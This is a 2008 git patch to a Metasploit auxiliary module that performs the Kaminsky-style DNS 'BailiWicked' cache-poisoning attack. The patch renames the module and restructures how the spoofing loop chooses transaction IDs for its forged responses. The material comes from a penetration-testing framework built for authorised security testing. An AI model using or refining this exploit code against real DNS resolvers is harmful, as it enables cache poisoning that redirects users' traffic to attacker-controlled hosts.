From e0bdbacb5d0055040052f68a795a3227b1f52c3f Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 23 Jul 2008 23:09:21 +0000
Subject: [PATCH] Better XID mixing

git-svn-id: file:///home/svn/framework3/trunk@5585 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/auxiliary/spoof/dns/bailiwicked_host.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb
index 5edf2016f1..182a734f9b 100644
--- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb
+++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb
@@ -11,7 +11,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 
 	def initialize(info = {})
 		super(update_info(info,	
-			'Name'           => 'DNS BailiWicked Attack',
+			'Name'           => 'DNS BailiWicked Host Attack',
 			'Description'    => %q{
 				This exploit attacks a fairly ubiquitous flaw in DNS implementations which 
 				Dan Kaminsky found and disclosed ~Jul 2008.  This exploit caches a single
@@ -132,6 +132,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 		recons   = datastore['RECONS']
 		xids     = datastore['XIDS'].to_i
 		ttl      = datastore['TTL'].to_i
+		xidbase  = rand(4)+2*10000
 
 		domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]
 
@@ -272,8 +273,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 			req.qr = 1
 			req.ra = 1
 
-			p = rand(4)+2*10000
-			p.upto(p+xids-1) do |id|
+			xidbase.upto(xidbase+xids-1) do |id|
 				req.id = id
 				barbs.each do |barb|
 					buff = (